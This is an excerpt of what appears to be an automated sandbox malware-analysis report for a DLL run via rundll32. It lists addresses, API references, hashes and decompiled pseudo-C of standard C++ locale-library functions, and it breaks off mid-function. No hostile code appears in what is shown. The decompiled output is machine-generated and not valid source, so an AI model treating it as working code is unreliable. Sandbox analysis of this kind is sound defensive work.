                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1
                          0x6e20f664
                          0x6e20f664
                          0x6e20f667
                          0x6e20f66b
                          0x6e20f66f
                          0x6e20f67c
                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F614
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F61E
                          • int.LIBCPMT ref: 6E20F635
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • moneypunct.LIBCPMT ref: 6E20F658
                          • std::_Facet_Register.LIBCPMT ref: 6E20F66F
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F68F
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F6AD
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                          • String ID:
                          • API String ID: 113178234-0
                          • Opcode ID: cb6f4d7a64f764b0205d0bbe6a2a1405ced434aaf0f13f0228c205cd98ea7f70
                          • Instruction ID: 9f029279f3dec20ff8cca31f8de851de466ce8a13851c521c966489a781f5d2a
                          • Opcode Fuzzy Hash: cb6f4d7a64f764b0205d0bbe6a2a1405ced434aaf0f13f0228c205cd98ea7f70
                          • Instruction Fuzzy Hash: 24110675D0051E8FCF04DBE0C894AEEB77BAF44B18F240918E420AB2D0DB749A45CBA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E21B74C, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E21B74C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t125;
				signed int _t126;
				void* _t138;
				void* _t151;
				void* _t164;
				void* _t177;
				void* _t190;
				void* _t203;
				void* _t216;
				signed int _t321;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				void* _t374;

				_t346 = __edx;
				_t265 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t374 - 0x14, 0);
				_t357 =  *0x6e2c6e28; // 0x0
				 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
				 *(_t374 - 0x10) = _t357;
				_t125 = E6E1E161C(0x6e2c6e08);
				_t268 =  *((intOrPtr*)(_t374 + 8));
				_t126 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t125);
				_t348 = _t126;
				if(_t126 != 0) {
					L5:
					E6E2066BA(_t374 - 0x14);
					return E6E220075(_t348);
				} else {
					if(_t357 == 0) {
						_push( *((intOrPtr*)(_t374 + 8)));
						_push(_t374 - 0x10);
						__eflags = E6E21BF46(__ebx, _t268, __edx, _t348, _t357) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t374 - 0x20);
							E6E223D74(_t374 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t348, _t357, 0x14);
							E6E206653(_t374 - 0x14, 0);
							_t358 =  *0x6e2c6e2c; // 0x0
							 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
							 *(_t374 - 0x10) = _t358;
							_t138 = E6E1E161C(0x6e2c6e0c);
							_t275 =  *((intOrPtr*)(_t374 + 8));
							_t349 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t138);
							__eflags = _t349;
							if(_t349 != 0) {
								L12:
								E6E2066BA(_t374 - 0x14);
								return E6E220075(_t349);
							} else {
								__eflags = _t358;
								if(_t358 == 0) {
									_push( *((intOrPtr*)(_t374 + 8)));
									_push(_t374 - 0x10);
									__eflags = E6E21BFE8(_t265, _t275, __edx, _t349, _t358) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t374 - 0x20);
										E6E223D74(_t374 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t265, _t349, _t358, 0x14);
										E6E206653(_t374 - 0x14, 0);
										_t359 =  *0x6e2c6e30; // 0x0
										 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
										 *(_t374 - 0x10) = _t359;
										_t151 = E6E1E161C(0x6e2c6e10);
										_t282 =  *((intOrPtr*)(_t374 + 8));
										_t350 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t151);
										__eflags = _t350;
										if(_t350 != 0) {
											L19:
											E6E2066BA(_t374 - 0x14);
											return E6E220075(_t350);
										} else {
											__eflags = _t359;
											if(_t359 == 0) {
												_push( *((intOrPtr*)(_t374 + 8)));
												_push(_t374 - 0x10);
												__eflags = E6E21C050(_t265, _t282, __edx, _t350, _t359) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t374 - 0x20);
													E6E223D74(_t374 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t265, _t350, _t359, 0x14);
													E6E206653(_t374 - 0x14, 0);
													_t360 =  *0x6e2c6e34; // 0x0
													 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
													 *(_t374 - 0x10) = _t360;
													_t164 = E6E1E161C(0x6e2c6e14);
													_t289 =  *((intOrPtr*)(_t374 + 8));
													_t351 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t164);
													__eflags = _t351;
													if(_t351 != 0) {
														L26:
														E6E2066BA(_t374 - 0x14);
														return E6E220075(_t351);
													} else {
														__eflags = _t360;
														if(_t360 == 0) {
															_push( *((intOrPtr*)(_t374 + 8)));
															_push(_t374 - 0x10);
															__eflags = E6E21C0B8(_t265, _t289, _t346, _t351, _t360) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t374 - 0x20);
																E6E223D74(_t374 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t265, _t351, _t360, 0x14);
																E6E206653(_t374 - 0x14, 0);
																_t361 =  *0x6e2c6e3c; // 0x0
																 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																 *(_t374 - 0x10) = _t361;
																_t177 = E6E1E161C(0x6e2c6e1c);
																_t296 =  *((intOrPtr*)(_t374 + 8));
																_t352 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t177);
																__eflags = _t352;
																if(_t352 != 0) {
																	L33:
																	E6E2066BA(_t374 - 0x14);
																	return E6E220075(_t352);
																} else {
																	__eflags = _t361;
																	if(_t361 == 0) {
																		_push( *((intOrPtr*)(_t374 + 8)));
																		_push(_t374 - 0x10);
																		__eflags = E6E21C120(_t265, _t296, _t346, _t352, _t361) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t374 - 0x20);
																			E6E223D74(_t374 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t265, _t352, _t361, 0x14);
																			E6E206653(_t374 - 0x14, 0);
																			_t362 =  *0x6e2c6e38; // 0x0
																			 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																			 *(_t374 - 0x10) = _t362;
																			_t190 = E6E1E161C(0x6e2c6e18);
																			_t303 =  *((intOrPtr*)(_t374 + 8));
																			_t353 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t190);
																			__eflags = _t353;
																			if(_t353 != 0) {
																				L40:
																				E6E2066BA(_t374 - 0x14);
																				return E6E220075(_t353);
																			} else {
																				__eflags = _t362;
																				if(_t362 == 0) {
																					_push( *((intOrPtr*)(_t374 + 8)));
																					_push(_t374 - 0x10);
																					__eflags = E6E21C1A4(_t265, _t303, _t346, _t353, _t362) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t374 - 0x20);
																						E6E223D74(_t374 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t265, _t353, _t362, 0x14);
																						E6E206653(_t374 - 0x14, 0);
																						_t363 =  *0x6e2c6e40; // 0x0
																						 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																						 *(_t374 - 0x10) = _t363;
																						_t203 = E6E1E161C(0x6e2c6e20);
																						_t310 =  *((intOrPtr*)(_t374 + 8));
																						_t354 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t203);
																						__eflags = _t354;
																						if(_t354 != 0) {
																							L47:
																							E6E2066BA(_t374 - 0x14);
																							return E6E220075(_t354);
																						} else {
																							__eflags = _t363;
																							if(_t363 == 0) {
																								_push( *((intOrPtr*)(_t374 + 8)));
																								_push(_t374 - 0x10);
																								__eflags = E6E21C229(_t265, _t310, _t346, _t354, _t363) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t374 - 0x20);
																									E6E223D74(_t374 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t265, _t354, _t363, 0x14);
																									E6E206653(_t374 - 0x14, 0);
																									_t364 =  *0x6e2c6e44; // 0x0
																									 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																									 *(_t374 - 0x10) = _t364;
																									_t216 = E6E1E161C(0x6e2c6e24);
																									_t317 =  *((intOrPtr*)(_t374 + 8));
																									_t355 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t216);
																									__eflags = _t355;
																									if(_t355 != 0) {
																										L54:
																										E6E2066BA(_t374 - 0x14);
																										return E6E220075(_t355);
																									} else {
																										__eflags = _t364;
																										if(_t364 == 0) {
																											_push( *((intOrPtr*)(_t374 + 8)));
																											_push(_t374 - 0x10);
																											__eflags = E6E21C295(_t265, _t317, _t346, _t355, _t364) - 0xffffffff;
																											if(__eflags == 0) {
																												_t321 = _t374 - 0x20;
																												E6E1E1438(_t321);
																												E6E223D74(_t374 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e26851f, _t265, _t355, _t364, 4);
																												_t365 = _t321;
																												 *(_t374 - 0x10) = _t365;
																												 *((intOrPtr*)(_t365 + 4)) =  *((intOrPtr*)(_t374 + 0xc));
																												_push( *((intOrPtr*)(_t374 + 0x14)));
																												_t119 = _t374 - 4;
																												 *_t119 =  *(_t374 - 4) & 0x00000000;
																												__eflags =  *_t119;
																												 *_t365 = 0x6e26c414;
																												 *((char*)(_t365 + 0x28)) =  *((intOrPtr*)(_t374 + 0x10));
																												E6E21D028(_t265, _t321, _t346, _t355, _t365,  *_t119);
																												return E6E220075(_t365,  *((intOrPtr*)(_t374 + 8)));
																											} else {
																												_t355 =  *(_t374 - 0x10);
																												 *(_t374 - 0x10) = _t355;
																												 *(_t374 - 4) = 1;
																												E6E206FD3(__eflags, _t355);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t355 + 4))))();
																												 *0x6e2c6e44 = _t355;
																												goto L54;
																											}
																										} else {
																											_t355 = _t364;
																											goto L54;
																										}
																									}
																								} else {
																									_t354 =  *(_t374 - 0x10);
																									 *(_t374 - 0x10) = _t354;
																									 *(_t374 - 4) = 1;
																									E6E206FD3(__eflags, _t354);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t354 + 4))))();
																									 *0x6e2c6e40 = _t354;
																									goto L47;
																								}
																							} else {
																								_t354 = _t363;
																								goto L47;
																							}
																						}
																					} else {
																						_t353 =  *(_t374 - 0x10);
																						 *(_t374 - 0x10) = _t353;
																						 *(_t374 - 4) = 1;
																						E6E206FD3(__eflags, _t353);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t353 + 4))))();
																						 *0x6e2c6e38 = _t353;
																						goto L40;
																					}
																				} else {
																					_t353 = _t362;
																					goto L40;
																				}
																			}
																		} else {
																			_t352 =  *(_t374 - 0x10);
																			 *(_t374 - 0x10) = _t352;
																			 *(_t374 - 4) = 1;
																			E6E206FD3(__eflags, _t352);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t352 + 4))))();
																			 *0x6e2c6e3c = _t352;
																			goto L33;
																		}
																	} else {
																		_t352 = _t361;
																		goto L33;
																	}
																}
															} else {
																_t351 =  *(_t374 - 0x10);
																 *(_t374 - 0x10) = _t351;
																 *(_t374 - 4) = 1;
																E6E206FD3(__eflags, _t351);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t351 + 4))))();
																 *0x6e2c6e34 = _t351;
																goto L26;
															}
														} else {
															_t351 = _t360;
															goto L26;
														}
													}
												} else {
													_t350 =  *(_t374 - 0x10);
													 *(_t374 - 0x10) = _t350;
													 *(_t374 - 4) = 1;
													E6E206FD3(__eflags, _t350);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t350 + 4))))();
													 *0x6e2c6e30 = _t350;
													goto L19;
												}
											} else {
												_t350 = _t359;
												goto L19;
											}
										}
									} else {
										_t349 =  *(_t374 - 0x10);
										 *(_t374 - 0x10) = _t349;
										 *(_t374 - 4) = 1;
										E6E206FD3(__eflags, _t349);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t349 + 4))))();
										 *0x6e2c6e2c = _t349;
										goto L12;
									}
								} else {
									_t349 = _t358;
									goto L12;
								}
							}
						} else {
							_t348 =  *(_t374 - 0x10);
							 *(_t374 - 0x10) = _t348;
							 *(_t374 - 4) = 1;
							E6E206FD3(__eflags, _t348);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t348 + 4))))();
							 *0x6e2c6e28 = _t348;
							goto L5;
						}
					} else {
						_t348 = _t357;
						goto L5;
					}
				}
			}






























                          0x6e21b74c
                          0x6e21b74c
                          0x6e21b753
                          0x6e21b75d
                          0x6e21b762
                          0x6e21b76d
                          0x6e21b771
                          0x6e21b774
                          0x6e21b779
                          0x6e21b77d
                          0x6e21b782
                          0x6e21b786
                          0x6e21b7cb
                          0x6e21b7ce
                          0x6e21b7da
                          0x6e21b788
                          0x6e21b78a
                          0x6e21b790
                          0x6e21b796
                          0x6e21b79e
                          0x6e21b7a1
                          0x6e21b7de
                          0x6e21b7ec
                          0x6e21b7f1
                          0x6e21b7f9
                          0x6e21b803
                          0x6e21b808
                          0x6e21b813
                          0x6e21b817
                          0x6e21b81a
                          0x6e21b81f
                          0x6e21b828
                          0x6e21b82a
                          0x6e21b82c
                          0x6e21b871
                          0x6e21b874
                          0x6e21b880
                          0x6e21b82e
                          0x6e21b82e
                          0x6e21b830
                          0x6e21b836
                          0x6e21b83c
                          0x6e21b844
                          0x6e21b847
                          0x6e21b884
                          0x6e21b892
                          0x6e21b897
                          0x6e21b89f
                          0x6e21b8a9
                          0x6e21b8ae
                          0x6e21b8b9
                          0x6e21b8bd
                          0x6e21b8c0
                          0x6e21b8c5
                          0x6e21b8ce
                          0x6e21b8d0
                          0x6e21b8d2
                          0x6e21b917
                          0x6e21b91a
                          0x6e21b926
                          0x6e21b8d4
                          0x6e21b8d4
                          0x6e21b8d6
                          0x6e21b8dc
                          0x6e21b8e2
                          0x6e21b8ea
                          0x6e21b8ed
                          0x6e21b92a
                          0x6e21b938
                          0x6e21b93d
                          0x6e21b945
                          0x6e21b94f
                          0x6e21b954
                          0x6e21b95f
                          0x6e21b963
                          0x6e21b966
                          0x6e21b96b
                          0x6e21b974
                          0x6e21b976
                          0x6e21b978
                          0x6e21b9bd
                          0x6e21b9c0
                          0x6e21b9cc
                          0x6e21b97a
                          0x6e21b97a
                          0x6e21b97c
                          0x6e21b982
                          0x6e21b988
                          0x6e21b990
                          0x6e21b993
                          0x6e21b9d0
                          0x6e21b9de
                          0x6e21b9e3
                          0x6e21b9eb
                          0x6e21b9f5
                          0x6e21b9fa
                          0x6e21ba05
                          0x6e21ba09
                          0x6e21ba0c
                          0x6e21ba11
                          0x6e21ba1a
                          0x6e21ba1c
                          0x6e21ba1e
                          0x6e21ba63
                          0x6e21ba66
                          0x6e21ba72
                          0x6e21ba20
                          0x6e21ba20
                          0x6e21ba22
                          0x6e21ba28
                          0x6e21ba2e
                          0x6e21ba36
                          0x6e21ba39
                          0x6e21ba76
                          0x6e21ba84
                          0x6e21ba89
                          0x6e21ba91
                          0x6e21ba9b
                          0x6e21baa0
                          0x6e21baab
                          0x6e21baaf
                          0x6e21bab2
                          0x6e21bab7
                          0x6e21bac0
                          0x6e21bac2
                          0x6e21bac4
                          0x6e21bb09
                          0x6e21bb0c
                          0x6e21bb18
                          0x6e21bac6
                          0x6e21bac6
                          0x6e21bac8
                          0x6e21bace
                          0x6e21bad4
                          0x6e21badc
                          0x6e21badf
                          0x6e21bb1c
                          0x6e21bb2a
                          0x6e21bb2f
                          0x6e21bb37
                          0x6e21bb41
                          0x6e21bb46
                          0x6e21bb51
                          0x6e21bb55
                          0x6e21bb58
                          0x6e21bb5d
                          0x6e21bb66
                          0x6e21bb68
                          0x6e21bb6a
                          0x6e21bbaf
                          0x6e21bbb2
                          0x6e21bbbe
                          0x6e21bb6c
                          0x6e21bb6c
                          0x6e21bb6e
                          0x6e21bb74
                          0x6e21bb7a
                          0x6e21bb82
                          0x6e21bb85
                          0x6e21bbc2
                          0x6e21bbd0
                          0x6e21bbd5
                          0x6e21bbdd
                          0x6e21bbe7
                          0x6e21bbec
                          0x6e21bbf7
                          0x6e21bbfb
                          0x6e21bbfe
                          0x6e21bc03
                          0x6e21bc0c
                          0x6e21bc0e
                          0x6e21bc10
                          0x6e21bc55
                          0x6e21bc58
                          0x6e21bc64
                          0x6e21bc12
                          0x6e21bc12
                          0x6e21bc14
                          0x6e21bc1a
                          0x6e21bc20
                          0x6e21bc28
                          0x6e21bc2b
                          0x6e21bc65
                          0x6e21bc68
                          0x6e21bc76
                          0x6e21bc7b
                          0x6e21bc83
                          0x6e21bc88
                          0x6e21bc8a
                          0x6e21bc90
                          0x6e21bc93
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bca0
                          0x6e21bca6
                          0x6e21bca9
                          0x6e21bcb5
                          0x6e21bc2d
                          0x6e21bc2d
                          0x6e21bc30
                          0x6e21bc34
                          0x6e21bc38
                          0x6e21bc45
                          0x6e21bc4d
                          0x6e21bc4f
                          0x00000000
                          0x6e21bc4f
                          0x6e21bc16
                          0x6e21bc16
                          0x00000000
                          0x6e21bc16
                          0x6e21bc14
                          0x6e21bb87
                          0x6e21bb87
                          0x6e21bb8a
                          0x6e21bb8e
                          0x6e21bb92
                          0x6e21bb9f
                          0x6e21bba7
                          0x6e21bba9
                          0x00000000
                          0x6e21bba9
                          0x6e21bb70
                          0x6e21bb70
                          0x00000000
                          0x6e21bb70
                          0x6e21bb6e
                          0x6e21bae1
                          0x6e21bae1
                          0x6e21bae4
                          0x6e21bae8
                          0x6e21baec
                          0x6e21baf9
                          0x6e21bb01
                          0x6e21bb03
                          0x00000000
                          0x6e21bb03
                          0x6e21baca
                          0x6e21baca
                          0x00000000
                          0x6e21baca
                          0x6e21bac8
                          0x6e21ba3b
                          0x6e21ba3b
                          0x6e21ba3e
                          0x6e21ba42
                          0x6e21ba46
                          0x6e21ba53
                          0x6e21ba5b
                          0x6e21ba5d
                          0x00000000
                          0x6e21ba5d
                          0x6e21ba24
                          0x6e21ba24
                          0x00000000
                          0x6e21ba24
                          0x6e21ba22
                          0x6e21b995
                          0x6e21b995
                          0x6e21b998
                          0x6e21b99c
                          0x6e21b9a0
                          0x6e21b9ad
                          0x6e21b9b5
                          0x6e21b9b7
                          0x00000000
                          0x6e21b9b7
                          0x6e21b97e
                          0x6e21b97e
                          0x00000000
                          0x6e21b97e
                          0x6e21b97c
                          0x6e21b8ef
                          0x6e21b8ef
                          0x6e21b8f2
                          0x6e21b8f6
                          0x6e21b8fa
                          0x6e21b907
                          0x6e21b90f
                          0x6e21b911
                          0x00000000
                          0x6e21b911
                          0x6e21b8d8
                          0x6e21b8d8
                          0x00000000
                          0x6e21b8d8
                          0x6e21b8d6
                          0x6e21b849
                          0x6e21b849
                          0x6e21b84c
                          0x6e21b850
                          0x6e21b854
                          0x6e21b861
                          0x6e21b869
                          0x6e21b86b
                          0x00000000
                          0x6e21b86b
                          0x6e21b832
                          0x6e21b832
                          0x00000000
                          0x6e21b832
                          0x6e21b830
                          0x6e21b7a3
                          0x6e21b7a3
                          0x6e21b7a6
                          0x6e21b7aa
                          0x6e21b7ae
                          0x6e21b7bb
                          0x6e21b7c3
                          0x6e21b7c5
                          0x00000000
                          0x6e21b7c5
                          0x6e21b78c
                          0x6e21b78c
                          0x00000000
                          0x6e21b78c
                          0x6e21b78a

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E21B753
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E21B75D
                          • int.LIBCPMT ref: 6E21B774
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • collate.LIBCPMT ref: 6E21B797
                          • std::_Facet_Register.LIBCPMT ref: 6E21B7AE
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E21B7CE
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E21B7EC
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
                          • String ID:
                          • API String ID: 2363045490-0
                          • Opcode ID: 6476b8c762631364781cd38094cf18bfc38da94108dc080aa45f3d1f461903ff
                          • Instruction ID: 7624d2fd8d0dbc0651cbef8b4529f7c1278a29cac0ae02a43c025bbc50aa34c0
                          • Opcode Fuzzy Hash: 6476b8c762631364781cd38094cf18bfc38da94108dc080aa45f3d1f461903ff
                          • Instruction Fuzzy Hash: 8311E77A91461ECBCF00DBE0C894EFDB7BBAF44B14F140909E510AB390DBB49A45C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E21B7F2, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E21B7F2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t111;
				signed int _t112;
				void* _t124;
				void* _t137;
				void* _t150;
				void* _t163;
				void* _t176;
				void* _t189;
				signed int _t283;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				void* _t330;

				_t305 = __edx;
				_t234 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t330 - 0x14, 0);
				_t315 =  *0x6e2c6e2c; // 0x0
				 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
				 *(_t330 - 0x10) = _t315;
				_t111 = E6E1E161C(0x6e2c6e0c);
				_t237 =  *((intOrPtr*)(_t330 + 8));
				_t112 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t111);
				_t307 = _t112;
				if(_t112 != 0) {
					L5:
					E6E2066BA(_t330 - 0x14);
					return E6E220075(_t307);
				} else {
					if(_t315 == 0) {
						_push( *((intOrPtr*)(_t330 + 8)));
						_push(_t330 - 0x10);
						__eflags = E6E21BFE8(__ebx, _t237, __edx, _t307, _t315) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t330 - 0x20);
							E6E223D74(_t330 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t307, _t315, 0x14);
							E6E206653(_t330 - 0x14, 0);
							_t316 =  *0x6e2c6e30; // 0x0
							 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
							 *(_t330 - 0x10) = _t316;
							_t124 = E6E1E161C(0x6e2c6e10);
							_t244 =  *((intOrPtr*)(_t330 + 8));
							_t308 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t124);
							__eflags = _t308;
							if(_t308 != 0) {
								L12:
								E6E2066BA(_t330 - 0x14);
								return E6E220075(_t308);
							} else {
								__eflags = _t316;
								if(_t316 == 0) {
									_push( *((intOrPtr*)(_t330 + 8)));
									_push(_t330 - 0x10);
									__eflags = E6E21C050(_t234, _t244, __edx, _t308, _t316) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t330 - 0x20);
										E6E223D74(_t330 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t234, _t308, _t316, 0x14);
										E6E206653(_t330 - 0x14, 0);
										_t317 =  *0x6e2c6e34; // 0x0
										 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
										 *(_t330 - 0x10) = _t317;
										_t137 = E6E1E161C(0x6e2c6e14);
										_t251 =  *((intOrPtr*)(_t330 + 8));
										_t309 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t137);
										__eflags = _t309;
										if(_t309 != 0) {
											L19:
